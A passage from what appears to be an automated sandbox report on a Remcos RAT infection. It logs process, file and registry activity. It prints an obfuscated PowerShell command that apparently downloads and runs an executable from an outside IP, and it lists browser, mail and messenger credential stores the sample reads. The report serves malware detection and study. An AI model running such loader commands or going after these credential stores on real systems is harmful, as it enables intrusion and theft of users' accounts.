fbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jeflicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjlukrlzmluavrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagiez3d0ssc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrehbsgdcreysc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagqkhzlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbuvyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbwdxphbuvkktsnicagicagicagicagicagicagicagicagicagicagicaglu5btuugicagicagicagicagicagicagicagicagicagicagicaic3miicagicagicagicagicagicagicagicagicagicagicaglw5btuvzugfdzsagicagicagicagicagicagicagicagicagicagicagielrc250tgdtu3f0icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrbszo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiymc4ymi80mzavzgxsag9zdc5leguilcikzw52okfquerbvefczgxsag9zdc5leguildasmck7c3rhclqtc2xfrxaomyk7u1rhunqgicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgrsbghvc3quzxhlig=='+[char]0x22+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,34_2_0041881C
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,35_2_004082CD
          Source: C:\Users\user\AppData\Roaming\dllhost.exeCode function: 11_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040333D
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR
          Searches for Windows Mail specific files
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
          Tries to steal Instant Messenger accounts or passwords
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
